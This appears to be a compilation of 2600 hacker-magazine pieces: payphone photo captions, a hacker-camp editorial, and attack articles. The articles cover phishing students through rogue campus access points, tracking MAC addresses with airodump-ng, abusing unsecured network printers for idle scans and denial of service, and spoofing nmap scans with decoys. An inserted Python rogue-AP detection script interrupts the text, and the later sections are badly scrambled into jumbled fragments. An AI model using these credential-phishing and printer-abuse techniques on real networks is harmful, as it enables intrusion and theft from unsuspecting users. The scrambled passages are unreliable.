South Africa. Found at the waterfront in Cape Town, this Telkom payphone takes both coins and cards. Photo by TProphet

Payphones in Exotic Places

Guatemala. One of the typical phones found throughout the country. Photo by Gary Davenport

Payphones in Exotic Places

Burkina Faso. This rather dusty phone was found in the city of Ouagadougou. Note the symbol for international calling: one flag connecting to another. Photo by M J

Payphones in Exotic Places

Rwanda. Seen in the departures area of the Kigali Airport. (It didn’t work, incidentally.) Photo by Jeffrey Mann

Payphones in Exotic Places

Mauritius. This brightly colored model that takes both coins and cards was discovered beside the Pereybere Beach in Pereybere. Photo by Scott Brown

Unusual Looking Payphones

France. The unusual thing about this phone found in the countryside is the fact that it takes neither coins nor cards. In fact, this phone can only make emergency calls or calls using credit or calling cards. In France, the law states that every city, town, or village must have at least one payphone. Photo by Mike Miller

Unusual Looking Payphones

Japan. They don’t really get much pinker than this model, found in a park in Ueno, Tokyo. Photo by Jim E. Etheredge II

Unusual Looking Payphones

Thailand. Seen in a place called Chiang Mai, or perhaps it was just a hallucination. Photo by professor ned

Unusual Looking Payphones

Russia. This was actually the grand opening of a payphone in Kamchatka Oblast. These people must really appreciate telephony. We can’t even imagine one of our phones being celebrated so festively. Photo by Curtis Vaughan

Unusual Payphones

In the United States, you might say payphones are a dying breed. Found in Franklin, South Carolina outside a gas station on the highway 23/74 bypass. Photo by Sam T. Hoover

Unusual Payphones

Quite the opposite holds true in Kyrgyzstan. These models have existed for ages in the old Soviet Union. This one, found in Bishkek, has been converted to touch tone from rotary dial and it’s also been freshly painted. It’s not going anywhere. Photo by romano.tamo


Unusual Payphones

We never tire of these weird little payphones found all over Japan. One has to wonder what’s really going on in all that space under the hood. It being pink and rotary is just an added bonus. Found in the lobby of a hotel in rural Suzuka. Photo by Darren Stone


Unusual Payphones

And we’re back in the United States again where (did we mention?) payphones are a dying breed. And in a variety of styles. Found in Newport Beach, California. Photo by Matt Figroid


Unusual Phone Booths

One of these phones is not like the other. These booths were found outside the phone company building in Grand Turk, part of the Turks and Caicos Islands. The phone company, incidentally, is known as LIME (Landline, Internet, Mobile, Entertainment). Photo by Dieselpwner


Unusual Phone Booths

This is about as grandiose as it gets. This booth, found in Arrowtown, New Zealand, is closer to the size of an apartment than a phone booth in many parts of the world. Photo by Michael Hall


Unusual Phone Booths

This one is just unusual on a variety of levels. The colorful booth, the bright blue phone, the old street scene, even that strange word that means telephone. This is, of course, in Lithuania, in the old town district of Vilnius. Photo by Elvis

Unusual Phone Booths

In the United States, payphones are going through a confusing period, as is evidenced by these ones found in West Caldwell, New Jersey. They were seen outside a ShopRite in a neighborhood with no obvious Asian connection. Why they are Chinese-themed is anyone’s guess. Photo by Conor Laverty

It was another historic summer. For a good number of us, the accomplishments mirrored those of previous years. For many others, it was something entirely new. For the hacker community at large, the summer of 2009 represented a reaffirmation and a significant expansion into brand new territory. For this year also saw something brand new.

The concept of a hacker camp was first realized in 1993 as Hacking at the End of the Universe (HEU) was held in the Netherlands. It was enough to inspire us to move ahead with the first HOPE conference a year later in New York. Another Dutch hacker camp took place four years later in 1997, known as Hacking In Progress (HIP), held in conjunction with the second HOPE conference (Beyond HOPE). That, in turn, was the first American conference to draw over 1,000 attendees. Then, the German Chaos Computer Club put together the first German hacker camp in 1999. From that point, HOPE conferences in New York were held during even years and alternated with the European hacker camps which, in turn, alternated between Germany and the Netherlands during odd years. The Germans held Chaos Communication Camps in 2003 and 2007 while the Dutch held Hacking At Large (HAL) in 2001 and What The Hack in 2005. Add to that list this year’s presentation of Hacking At Random (HAR). Apart from a seemingly neverending supply of clever names, the spirit of these events also seems limitless. Not to mention contagious.

Just as we once thought it would be impossible to hold a massive hacker conference in the United States, we also believed pulling off a hacker camp most certainly would never happen in this country. We’re happy to have been proven very wrong. The first ever hacker camp in the United States became a reality in early July. ToorCamp took place in the middle of Washington State at, of all places, the site of a former nuclear missile silo. We’ve gotten used to the Germans having camps and conferences at old military airports or former communist training centers. How is it possible to measure up to that level of coolness? To have hundreds of hackers occupying a site that once could have been a trigger to the end of the world is both surreal and inspirational. It wasn’t nearly as big as the European counterparts, but it was every bit as significant. Not only was ToorCamp held in an amazing setting, but the sheer amount of responsibility the attendees displayed rivaled that of the overseas conferences. The only way an outdoor hacker conference can possibly work in a place like an old missile silo is if everyone works together and makes sure safety is a priority in a potentially hazardous environment. There, people in our unique community figured out a way to build a mini city in the middle of the wilderness, complete with power and connectivity, dedicated to the world of hacking and innovation, where everyone is a volunteer and security is relatively seamless and transparent. With a little ingenuity and a lot of spirit, all kinds of events in the most unlikely of locations can be successfully coordinated. History was made. This summer, for the first time, a big step was taken in achieving parity. Now that we know it can be done, we have a whole country of really neat places to hold the next one in. There is almost no limit to the potential of where the next outdoor hacker event might take place in the States. Let’s hope the inspiration from this event leads to many more of them.

Naturally, we expected greatness from HAR and there was certainly no shortage of that. Four full days of talks and gatherings including people from so many different nationalities made it truly impossible to be bored. The time flew by incredibly fast. There really seemed to be no end to the innovation and fun that was possible at this event. Of course, an event of this nature has a great number of challenges and all of them were tackled by a very dedicated group of people, many of whom had arrived days before and wound up staying days later to ensure that everything worked out. A few of the tasks included keeping the wired and wireless connectivity going, managing the actual infrastructure of plumbing and power, coordinating the speaker schedules, dealing with the steady curiosity of the media and the authorities, and, of course, even running two separate phone systems. Yes, the camp had both a DECT wireless telephone system and its own GSM network, each allowing attendees to use their phones to call others on site for no charge. An FM radio station ran around the clock and captured the spirit of the proceedings with all sorts of interviews, news coverage, and music, every bit of which was done in a professional and fun manner.

While this type of magic has started to become almost routine for those of us involved in the hacker community, we do need to have this reinforced on a regular basis. This is how great things are possible, with the potential for innovation, change, and something completely unexpected and unanticipated. The kinds of conferences we’ve seen in ToorCamp and HAR (and we’d like to assume our own HOPE conferences) are significantly different from those events that treat their attendees as a mere audience. The people who run such conferences are very different and separate from those who attend and the hierarchy is painfully evident to all. Some people prefer it that way because they don’t really have to do anything except pay their admission fee and follow the instructions. A good hacker conference, however, has only a slight difference between those organizing the event and those who attend with no previous involvement. Oftentimes, sometimes in the course of the event itself, the latter turn into the former. This is essential in order for our community to continue to flourish. With every one of these milestones, more new people get involved and become inspired. And those new to the scene must try and learn from the experiences and mistakes of those who’ve been involved in the past. Having the same people doing the same thing, no matter how great it may be, would still be a form of stagnation. At all costs, we must avoid anything that erects barricades to new participants.

Have You Visited Our Store?

It’s not a brick and mortar establishment, but the things you can get are as tangible as they come. Everything from hacker shirts to hacker coffee mugs, subscriptions to 2600 along with back issue collections, plus DVDs from the various Hackers On Planet Earth conferences, cases of Club Mate, Nicola Tesla bills, and, because it’s a digital store, you can stagger in at any hour and make as much noise as you like. Annoying salespeople will never hound you. Why not stop on by? store.2600.com

Exploiting University Students using Rogue Access Points
By Anonymous

A rogue access point is a wireless access point that has been installed on a network without permission. It could just be an access point that was set up by a student or faculty member to provide wireless access in an area where none existed. Or, it could have a malicious objective like a man-in-the-middle attack where sensitive information could be stolen. The focus of the paper is explaining how rogue access points can be used in the university environment to exploit students and faculty workstations to gather sensitive data. First, I will examine the vulnerability. Second, I will describe the different attack vectors where one could exploit the vulnerability. Lastly, I will describe ways to collect sensitive data and how one could use the captured data.

Several years ago, my university installed 802.11 wireless access points throughout campus. In a corporate environment, you will find secured access points because the corporation is trying to keep unauthorized persons out of their network. However, in a university setting, they are trying to provide usability on their wireless so students and faculty can get on it without trouble. To allow usability, the university moved the authentication from the wireless protocol itself to a web based splash page asking for credentials. All of the access points communicate to the end devices with the same, unsecured SSID. By unsecured, I mean the access point is not secured with static WEP or WPA keys, or an enterprise authentication solution. When a user connects to the wireless, their web browser is automatically redirected to a SSL secured splash page where they are required to login to get access to the network. Once logged in, they have access to the network and Internet. There is no client-side software to this login and it is based off of the machine’s MAC/IP address.

Unfortunately, the wireless is set up in a way that allows for rogue access points to be brought onto the network easily. First, the APs are not secured. This means that a miscreant can create a rogue access point and everyone will automatically connect to it as though it was owned by the university. Second, all student laptops (and specifically those bought at the student store) will be actively looking for the university’s wireless connection. My university also sells laptop computers that come customized with common settings and shortcuts that the student would find useful. One of these settings is adding the university’s wireless network. This will allow any student who buys one of these laptops easy access onto the university’s wireless network without him/her having to setup anything. This means that every laptop purchased from the student stores will automatically be looking for and trying to connect to an unsecured access point. Even further helping the miscreant is that the laptops bought from the student store list the university’s wireless connection as the preferred connection. This means that they will connect to the university’s wireless network even when they are not at the university.

The laptops purchased at the student stores are not the only computers automatically looking for and trying to connect to the university’s unsecured access point. Any laptop that has ever connected to the wireless will now have that wireless connection in its wireless profile. If the user is running Windows and is using Wireless Zero Configuration (WZC), then every wireless network ever connected to will be in the preferred networks list. The higher the connection is on the list, the higher its priority. For example, if the user connected to the university’s wireless in 2008, and in 2009 connected it to their new wireless router at home, then the laptop will connect to the university’s SSID even if it sees their new wireless router as available. Since a lot of university students live in dorms their first year, the probability of having the university’s SSID near the top of their preferred networks list is high. A good majority of university students have laptops with the SSID of the university saved as a wireless profile.

If you merge the ideas from the last three paragraphs, then you end up with the vulnerability.

To gather information using a rogue access point, the miscreant has to figure out where students are when not at school. A good place to start would be their residence. The first attack vector is apartment complexes. There are tons of apartment complexes around my university, housing 1000s of people. The majority of the people living in these apartments are students at the university. As I mentioned, the university installed 802.11 APs around the campus, and if the university’s SSID is high in the preferred connections list, then a laptop will connect to it if it sees it available. Imagine three or four rogue APs each with high gain antennas positioned to pick up the most users; one could easily grab a bunch of users instantly. The number of users who will connect to the rogue AP is based on how high the university’s wireless profile is in the preferred network connections list. More users will also connect to it when their computer is restarted and looks for available wireless connections, or once the signal bleeds off. The longer one leaves the rogue AP on, the more users that will connect to it. I will call this the most effective method because the miscreant will not be seen, and will never have to hide any of their equipment. This is also the setup where one could have the most equipment. Along the same lines, one could just put the rogue AP in a car and mount the antennas on the roof. This would not provide the depth of coverage of the first method, but would be much easier to implement.

The second attack vector is dormitories. My university did not extend the wireless throughout the dormitories, but instead installed APs only in the lobbies and study areas (basements). This means that above the basement, there are 100s of laptops looking for the university’s SSID. If someone sets up a rogue AP, then anyone in proximity will automatically connect to it.

The third attack vector is on the campus. The primary reason for running a rogue at the university is to capture faculty data. If the miscreant is brave, and believes that the data he/she wants to collect is on the physical campus, then he/she could setup a rogue AP in the ceiling using a laptop by itself, or the combination of a laptop and external AP. All of these new “smart classrooms” have electrical outlets for the projectors above the ceiling tiles. The issue of long term power is easily solved. Not only will the AP run forever, but it is hidden from view. The downside to this is that if the university is running any kind of rogue AP detection, and actively monitors it, the rogue will be found. In reality, the value of the data one could potentially gather might outweigh the risk. Along the same lines as putting a laptop in the ceiling, one could put it in a book bag wired to a UPS. This would only last for a couple hours (depending on how much weight in batteries one wants to deal with), but is mobile and has little chance of someone ever finding it. Here is a scenario. Pretend you’re a student and go into a large lecture hall. If you find a hall where they teach an IT subject, then the majority of the students will bring their laptop. If you get to class before they do and get your book bag powered up, then there will be a high probability they will connect to you because your device will have the best signal strength. Power up your book bag, and hope that they connect to you. Again, if the university’s SSID is high in the preferred connections list, then it will connect to it if it sees it available.

After a miscreant has set up the rogue access point, they can start collecting data. The first obstacle for the miscreant is getting onto the wireless network so that he/she can serve Internet access and not arouse suspicion. I mentioned before that wireless access is based off of the laptop’s IP and MAC address. Simply sniffing the wireless will yield someone who is connected and possibly authenticated to the wireless. Then, by cloning their IP and MAC address, one is now logged into the wireless as someone else. Another option is to phish the university’s initial wireless splash page that requires logon. The credentials for the wireless are also what the student uses to access their email and other university websites.

From there, one would start by simply sniffing the traffic to determine which websites are being visited the most. Then, a local web and DNS server running on the laptop could be setup to serve phishing pages matching those sites. The reason for the phishing pages is that most credentials, at least ones that have any real value, will be sent across SSL. Creating a phishing site will guarantee the credentials, but may arouse suspicion if one doesn’t pass them to a believable error page or if they never get the real website. To get around this problem, a cron job could be used. Cron is a job scheduler for Unix/Linux operating systems. One could create a job that rotates the DNS entries between the IP that points to the phished and real website. In terms of believable error pages, Facebook has a habit of going into maintenance mode and only prompting a user that they are in this mode once they try to log in. A phished Facebook page throwing the user to the fake maintenance message would be highly effective.

Now that the miscreant has phished some credentials, there are several things one can do with them. For any captured credentials, there is a chance that the user uses the same password for other sites. For example, if one captures their Facebook password, then one might also have their MySpace password. The issue would now be guessing their username. If he/she captured the credentials for the wireless splash screen, one now has access to the student’s e-mail. Their e-mail address is the gateway to getting passwords to numerous other sites. For example, Facebook has a “forgot your password?” page that will send an email to reset your password. There is a good chance this email will go to the student’s university email address.

I have no insightful conclusion. That’s all. Go have fun! Shouts to all who have supplied me with the resources to learn.

Catching a Laptop Thief/WiFi Hacker
by Douglas Berdeaux douglas@weaknetlabs.com

Years ago, when I first saw the movie Track Down (Takedown), I was impressed. I thought it was a cool movie and have been bashed several times for such a statement. I even heard Kevin Mitnick once say that the movie “sucked” in an interview on a radio show. But out of all of the cheesy hacker movies, I felt that it had the coolest feel to it. The part in the movie where Shimomura is in the van searching for Mitnick gave me an idea. I could possibly do the same thing with MAC addresses and the aircrack-ng suite. With a cheap wireless card, I too could be trolling in the back of a van, or from my house when I wasn’t home, searching for a MAC address and not a MIN or ESN (yet). But again, I don’t own a van. I don’t have friends, and I wouldn’t really care if someone cracked my network security. But I would care if I had a laptop stolen from me in a mugging. I could then check the MAC address I wrote down of the internal WiFi card, or on the side of the laptop box, and search for it! This would, of course, only work if the thief weren’t smart enough to change the card, leave the state, etc. If you think of this situation with mathematical crime statistics and probability, it’s most likely the case.

Windows, and any other OS that has a network manager-like client running, will either be connected to an AP listed in your preferences, or will be probing for APs in your list, as if its life depended on it. The OS isn’t very embarrassed at this point to cry out! When a client probes for a preference AP, the data sent via WiFi will be visible to anyone in the surrounding area equipped with the proper setup. By this I mean anyone with a card that can be set to “monitor” mode by the user and running airodump-ng while channel hopping. If your prey (the MAC you’re searching for) comes within your wireless card’s sniffing range, you will see it.

I have had a lot of experience with WiFi cards, vendor types, and driver issues in the labs here and have found that almost any card that is detected by a Linux/Unix flavor OS can be set into “monitor” mode for sniffing, with the drivers included in your OS. This means that the card has the ability to “sniff” surrounding APs, but does not always mean it can “inject” fabricated packets. You would want to inject fabricated packets to deauthenticate a user in order to grab a WPA/WPA2 handshake, which would allow you to attempt to crack, say, the login info using aircrack-ng or cowpatty 4.0+, with a dictionary file or hash file. But in our case, we are simply sniffing, so any old card should do the trick. You can skim forums where they talk about this sort of thing, like wireless security, to find out which cards are best for the job. I would first recommend the Remote-Exploit forums, as they have almost benchmarked every card on the market for their sniffing capabilities! They have a lot of experience with wireless hacking and are first to point out a vulnerability, or code to exploit it.

Once you have a good card, and some patience, you’re ready to start searching for your cracker/laptop thief! First, boot up into a Live Linux disk like WeakNet Linux Assistant. Then connect to your wired internet and download the catchme-ng tarball here: http://weaknetlabs.com/code/catchme-ng/ Now disconnect and save the tarball for future use on a flash drive. Put your wireless cards down and kill networkmanager. Once started, a network manager will be actively sniffing for surrounding APs to suggest them to you, to list them for you to connect to; killing it usually turns off all of the network cards in one fell swoop. Type iwconfig to list all of your wireless cards. By typing ifconfig, you can list the cards that you have “turned on.” Then ifconfig <cardname> down will turn them off temporarily. This can also be accomplished by killing network-manager with killall networkmanager. Now we want to set our wireless card to monitor mode and turn it back on. Type iwconfig <cardname> mode monitor to set it to monitor mode. This is where you can determine if your card is capable of going into monitor mode. If successful, turn the card back on with ifconfig <cardname> up, and start airodump-ng with the --write to file option. Make sure you remember what your current working directory is and where you are saving your files to. I’d suggest changing directories and just saving them in /tmp. Now, fire up catchme-ng and click on the “…” button to find your “dump file” created by airodump-ng. Then select the MAC address you want to hunt for and click start. A loud siren sound will play, and a box will pop up saying “I’ve found the MAC specified.”
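The dump file catchme-ng reads is the CSV that airodump-ng writes next to its capture. As an added example (not code from this article or the rogue access point article before it), here is a Python script that reads that CSV in both directions: it flags BSSIDs beaconing a trusted SSID that are not on an allowlist (the rogue AP detection the previous article says a university might run), lists clients that are probing for that SSID and would therefore auto-join a rogue AP, and hunts one client MAC, reporting its PWR value the way catchme-ng does. The capture, every MAC, BSSID and SSID in it, and the allowlist are constructed and hypothetical.

```python
"""Read an airodump-ng CSV dump and answer three questions: which BSSIDs
beacon a trusted SSID without being on the allowlist (rogue AP detection),
which clients probe for that SSID (and would auto-join a rogue AP), and
where a specific client MAC was last seen and at what signal level (the
catchme-ng hunt). Added example, not code from either 2600 article. The
capture, all MACs/BSSIDs/SSIDs and the allowlist are constructed."""
import csv
import io

# Constructed capture in airodump-ng's CSV layout: an AP table, a blank
# line, then a station table. Real MACs/SSIDs would be read from the
# <prefix>-01.csv that `airodump-ng --write <prefix>` produces.
SAMPLE_DUMP = """
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:1A:2B:00:00:01, 2009-09-01 10:00:00, 2009-09-01 10:05:00,  6,  54, OPN , , , -45, 120, 0, 0.  0.  0.  0, 9, CampusNet,
00:1A:2B:00:00:02, 2009-09-01 10:00:00, 2009-09-01 10:05:00, 11,  54, OPN , , , -62,  98, 0, 0.  0.  0.  0, 9, CampusNet,
00:DE:AD:BE:EF:01, 2009-09-01 10:02:00, 2009-09-01 10:05:00,  6,  54, OPN , , , -30, 210, 0, 0.  0.  0.  0, 9, CampusNet,
00:AA:BB:CC:DD:EE, 2009-09-01 10:00:00, 2009-09-01 10:05:00,  1,  54, WPA2, CCMP, PSK, -70,  50, 0, 0.  0.  0.  0, 8, HomeNet1,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
00:16:CF:00:00:10, 2009-09-01 10:00:30, 2009-09-01 10:05:00, -50,  40, 00:DE:AD:BE:EF:01, CampusNet
00:16:CF:00:00:11, 2009-09-01 10:01:00, 2009-09-01 10:05:00, -72,   3, (not associated), CampusNet,HomeNet1
00:16:CF:00:00:12, 2009-09-01 10:01:30, 2009-09-01 10:04:00, -80,   1, (not associated), linksys
"""

# Hypothetical allowlist: the BSSIDs the campus wireless team actually owns.
AUTHORIZED_BSSIDS = {"00:1A:2B:00:00:01", "00:1A:2B:00:00:02"}


def parse_airodump_csv(text):
    """Return (aps, stations) parsed from airodump-ng CSV text.

    aps: list of {bssid, channel, privacy, power, essid}
    stations: list of {mac, power, bssid, probes}; the probed-ESSID column
    is itself comma separated, so every field past index 5 is one probe.
    """
    aps, stations = [], []
    section = None
    for row in csv.reader(io.StringIO(text), skipinitialspace=True):
        if not row or not row[0].strip():
            continue  # blank separator lines
        first = row[0].strip()
        if first == "BSSID":
            section = "ap"
            continue
        if first == "Station MAC":
            section = "station"
            continue
        if section == "ap" and len(row) >= 14:
            aps.append({"bssid": first, "channel": int(row[3].strip()),
                        "privacy": row[5].strip(), "power": int(row[8].strip()),
                        "essid": row[13].strip()})
        elif section == "station" and len(row) >= 6:
            stations.append({"mac": first, "power": int(row[3].strip()),
                             "bssid": row[5].strip(),
                             "probes": [p.strip() for p in row[6:] if p.strip()]})
    return aps, stations


def find_rogue_aps(aps, ssid, authorized_bssids):
    """BSSIDs beaconing `ssid` that are not in the allowlist (rogue AP detection)."""
    return sorted(ap["bssid"] for ap in aps
                  if ap["essid"] == ssid and ap["bssid"] not in authorized_bssids)


def clients_seeking(aps, stations, ssid):
    """Clients that would auto-join an AP for `ssid`: those probing for it,
    or already associated to any BSSID that beacons it (rogue or not)."""
    beaconing = {ap["bssid"] for ap in aps if ap["essid"] == ssid}
    return sorted(s["mac"] for s in stations
                  if ssid in s["probes"] or s["bssid"] in beaconing)


def hunt_mac(stations, target):
    """catchme-ng style hunt: None if `target` was not seen, else its PWR
    (dBm, closer to 0 means nearer), associated BSSID and probed ESSIDs."""
    for s in stations:
        if s["mac"].lower() == target.lower():
            return {"power": s["power"], "bssid": s["bssid"], "probes": s["probes"]}
    return None


if __name__ == "__main__":
    aps, stations = parse_airodump_csv(SAMPLE_DUMP)
    print("rogue APs for CampusNet:", find_rogue_aps(aps, "CampusNet", AUTHORIZED_BSSIDS))
    print("clients seeking CampusNet:", clients_seeking(aps, stations, "CampusNet"))
    print("hunt 00:16:cf:00:00:11:", hunt_mac(stations, "00:16:cf:00:00:11"))
```

Against a real dump, pass the text of the `-01.csv` file to `parse_airodump_csv` and rerun the hunt every few seconds while watching the PWR value rise as you get closer. A defender running the rogue check should also compare the channel of an unauthorized BSSID with the authorized ones; a stronger signal on the same channel as a legitimate AP is the pattern the rogue AP article describes.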

IT professionals simply plug the printer in and point computers to it. they only receive instructions to print and therefore do not need these various checks.txt. it would take a bit longer. Modern printers are no longer merely ink cartridges with a network card. access to network storage. of the client that is either “probing” for. Here is an example of such a LAN-nanny:
sudo ettercap -Tpi eth0 // // -k ➥ 1. say. is “run Ettercap.” Now. you can simply write a shell script to frequently check your LAN for new MAC addresses and dump them to a text file. you can now set up nearby and zero in even closer by watching the “PWR” field of airodump-ng. who broke into your network by comparing the logs of MAC addresses with your very own addresses and the foreign address being specified as the “prey. an AP.THE HACKER DIGEST . in nonpromiscuous mode (so there’s not a bunch of packets flooding the screen). A system is returned with ports 515 (Printer/LPD). print every line in 2. ARPs can seriously bog down traffic. 5 or 10 minutes or so. 443 and 23 are open by default. Law enforcement can find the MAC address of a stolen laptop.txt. use text mode. in plain English. If you aren’t sure how to find a MAC address in your logs. print each line in 1. They are ignoring the security implications of treating a printer as a “receive only” device. and email.txt This relies on Ettercap to find the MAC addresses on your LAN.txt | sort -u > MAC_List. and walk/drive/bike around your neighborhood with headphones on in search of your machine.txt | awk ➥ ‘{print $2}’ >> 2. ARP for all clients on LAN and make text file 1. and speed counts when you know that some wireless security measures are flawed when it comes to ARP requests. or connected to. To find one.
Why a printer?
You have scanned your network to find systems with open ports using a tool like Nmap or HPing2 (for this article. And that’s all there is to it. A spot in the visual field in which vision is absent or deficient. of course. Information security is full of scotomas. without creating doubles or overwriting previously seen MAC addresses. You can see the “power. so maybe less often would be recommended. If you find the machine.” Now simply make this run every. Enterprise/business computers have many checks and policies to monitor information coming from and going to them with devices like proxy servers and firewalls. Imagine the possibilities of these applications in parallel.” You can search for anything with a MAC address. You can pinpoint. There are endless possibilities!
Attacking a Blind Spot
by Tim Kulp (cloak13)
scotoma n. do not access the web or even other computers. we will be using Nmap). If we were to use the basic ARP program arp -a.
specified. These ports are the main PDL (Page
Attack 1: Building your zombie (scanner) army
. they are document management systems with large memory stores and direct server access.txt but only the MAC addresses column and append it to 2. on the other hand. This is a good choice because it’s fast. simply toss your laptop into your car/bookbag/etc. A quick browse of the Ricoh or HP printer websites reveals that modern printers are capable of much more than just putting ink on various paper sizes.txt -s q && cat 1. right? Many modern network printers have management features that can be accessed via a web browser or telnet. Printers. Too often.txt && cat
➥ 2. you can own and disrupt a network resource that is critical for most business functionality.txt sorting out the duplicates and spitting all of the unique MAC addresses into the text file MAC_List. with quite good accuracy. Using unsecured network printers. which means that ports 80. look no further than the network printer. which translates to broadcasting data and not just receiving it.txt with results. printers have hard drives. Today. use interface eth0. Another application of the program would be to create a game to with your friends to wirelessly search for them! The program is not biased and you can specify even an ESSID that you once used and have fond memories of. 631 (IPP) and 9100 (Jet Direct) open. really.” or pretty much the range. What the above script actually does.

you can always run: nmap -o [target IP address] The -o modifier tells nmap to determine the operating system of what you are scanning. As printers improve in capabilities and features. With a little scripting skill you can build an automated process that will print random strings. If you are still not sure. our target network printer). This will return the control menu. the port that receives all the PDL commands that we introduced earlier in the article. Using just the address of the printer and telnet. By targeting network printers. type “menu” and hit enter. IP address. when using a zombie scan. 4200. While a zombie scan can be useful. network printers are often forgotten in security audits and analysis. Keep this in mind during your next penetration test project. can cause major disruptions in the printer. subnet mask. you could type the following into the address bar of your web browser: http:// [printer IP address]:9100 Notice we are connecting to port 9100. and a ton of other mischievous things. This type of scan is great for hiding your computer’s identity while still retrieving useful and accurate port information from the target. Using telnet. another system tunnels the requests for you. for “TCP/IP Settings. Each GET would be printed out. blocking business
Conclusion
. The IDS/IPS will record the scanning system’s information which. As soon as network administrators realize no one can print to the specific printer. Telnet into the printer using a standard telnet open connection command: open [target printer’s IP address] If the printer is unsecured. If left unsecured. causing a tremendous waste of ink and paper as well as clogging the print queue and thus preventing other users from being able to print.” then select option 1. PDL is the command language network printers use to know how to draw the document that they are trying to print. you can change settings on an unsecured printer by connecting to port 23.
Attack 2: Killing trees. But wasting paper is not the only DoS we can perform. you will not be prompted for a username or password. or of a printer tied directly to the company’s Exchange server. but for this attack we are only delivering a scan through our printer. This will cause the printer to print the text that you typed before hitting Ctrl-]. the changed IP address will be discovered and corrected. This particular scan is useful when you know an IDS or IPS system will be logging scan activities. business’s operations or be other routes to a DoS attack. Using telnet and an unsecured printer. you can do a lot more with an unsecured printer. for “Main TCP/IP Settings. To get the hostname. then you can expect something like “HP LaserJet 4050/4200/4600/5100 (JetDirect) printer. 4600 or 5100 model. we are going to launch a DoS attack. We will walk through a quick scenario that will get the printer’s hostname using telnet and an unsecured HP 4050n printer. what kind of attacks could be used to compromise the connected systems? Like many non-computer devices. Many of these settings. select option 2. You can change the IP address here to create a simple. This connection will cause the printer to spit out an HTTP request. If the device is indeed a printer. The few examples in this article are simple attacks for standard network printers but can be used as a basis for more sophisticated attacks against robust printing systems. again causing the print queue to be flooded with bogus print requests. you can craft your own HTTP commands and flood the printer with HTTP GET requests. Let’s get this printer working for us. Return to the main menu and browse the other options to get a complete picture of all the settings you can manipulate. Using the following command in nmap: nmap -sI [printer IP address] [target IP address] The printer (now our zombie system) will scan the target for port information. If you get creative with a tool like Fiddler.
Another way to do this same attack is to connect to the printer via a web browser. but temporary. Whether or not the printer will then be secured is another story. you can send print jobs to the network printer. will be the zombie device (in this case. Imagine the security concerns of a “document management solution” printer. you can leverage a powerful network resource while operating in a very large security blind spot. DoS attack. while you are executing the scan. Type whatever you would like and press Ctrl-] to send the command to the printer. As an example. Having these ports open is a sure indicator that the device is a network printer.” This will return all of the general TCP/IP settings. This is called an idle scan or a zombie scan because. Connect to the printer via telnet: open [target IP address]:9100 This will open a telnet connection to port 9100. change the user time out. new security issues arise. including hostname. This is great information to start looking for vulnerabilities. etc. with slight changes.” which tells you that the network printer in question is an HP LaserJet and could be a 4050. After gaining access to the printer. You can use this connection to reset the Administrative Password.
Description Language) data stream ports.

no matter what OS you’re running. you can run Nmap on it. Solaris.24. because that IP that is scanning you is probably not the IP that you think it is. there are two arguments that I will go into in more depth: -S and -D.634 seconds
This is just to show you what I typed at the command prompt. Anyway.
Jan 15 00:13:01 mythbox IN=eth0 OUT= MAC=00:14:bf:5b:2d:5c:00:13:d4: ➥78:18:c6:08:00 SRC=12. so you can see how to use the -S argument and what to expect as possible results. Mac OS X. While they give System and Network administrators the ability to scan for unwanted holes in their firewalls. and computers.1.decoy2[.ME].168.27
Starting Nmap 4. If you do use “ME. And this is for educational purposes only.168...VOLUME 26
by Bryce Verdier
For people in the know. as Nmap likes to ping before scanning to make sure the host is online.1.168. but I’ve decided to use it here to be explicit.) For those who don’t know. This is a real good way to make the network administrators very angry. Nmap runs on Linux. but maybe you do. One of the most well known port scanners is Nmap.. (If you’re not.36. Disclaimer: Just because you’re about to learn a new tool today..48 DST=192. they also give malicious Internet users the ability to do the same thing and are usually the first tool a would-be intruder uses to find a way into a network. get permission.” And -D is described as.27) are filtered MAC Address: 00:14:BF:5B:2D:5C ➥ (Cisco-Linksys) Too many fingerprints match this ➥ host to give specific OS details Network Distance: 1 hop Nmap finished: 1 IP address (1 host ➥ up) scanned in 36. does not mean that you should go straight to work or school and just start scanning every computer in sight. So chances are that. From the manual.>: Cloak a scan with decoys” (notice no space between the comma decoy1 and decoy2).24..36. or decoys. I do not know if you would want to do this. Generally. -S has the explanation of.1. However. As I said above. “-S <IP_Address>: Spoof source address. I have a couple more arguments thrown in for good measure. then I would recommend you spend some time with it before continuing with this article.” you will put in your computer’s IP address as part of the cycle of decoys. or not. First the “-e” this is telling Nmap which network card to use.36.168.THE HACKER DIGEST . Nmap knows which card to use. and more. if you do not own the computer you’re about to scan.168. as the manual calls them.24. Nmap has the ability to change its scanning IP. So for everyone who lives by their firewall logs. Windows.48 -A -T4 192.1. obviously. servers.1. So be courteous. Now that we’ve gone over the boring stuff. and do the same trick with a group of IPs. 
you might want to start keeping a closer look at your logs concerning port scans. The next extra argument is “-P0.27 LEN=44 TOS=0x00 ➥ PREC=0x00 TTL=40 ➥ ID=63097 PROTO=TCP SPT=43468 DPT=1383 WINDOW=1024 ➥ RES=0x00 SYN URGP=0 Jan 15 00:13:01 mythbox IN=eth0 OUT= MAC=00:14:bf:5b:2d:5c:00:13:d4: ➥ 78:18:c6:08:00 SRC=12. port scanners are double-edged swords. “-D <decoy1. If you look in the screen shot on each line you’ll
.” This is to tell Nmap not to ping the host.62 ( http://nmap. FreeBSD. I am quite sure that some of the people reading this article are more adept with this tool than I am.24.48.48 DST=192.27 LEN=44 TOS=0x00 ➥ PREC=0x00 TTL=47 ➥ ID=56142 PROTO=TCP SPT=43469 DPT=722 WINDOW=4096 ➥ RES=0x00 SYN URGP=0
This output shows the results the command above has on my iptables firewall log. let’s look at some firewall logs. which I have set to spoof as 12. -S is to spoof the IP address of the hosting machine. let’s see some of these configurations in action:
$ sudo nmap -e eth0 -P0 -S ➥ 12.36.27 will be ➥ MUCH less reliable because we did not find at least ➥ 1 open and 1 closed TCP port All 1697 scanned ports on mythbox ➥ (192. ➥ org ) at 2009-01-15 00:13 PST Warning: OS detection for ➥ 192.

You can discover this for yourself by looking at the log messages and noticing what SRC equals.
Just like the first command. and that you can use an array of IP address to pretend to be other IPs while scanning.27): Not shown: 1693 filtered ports PORT STATE SERVICE VERSION 80/tcp open http lighttpd 1. So you might be wondering at this point why I say we almost hid our identity.com 11953
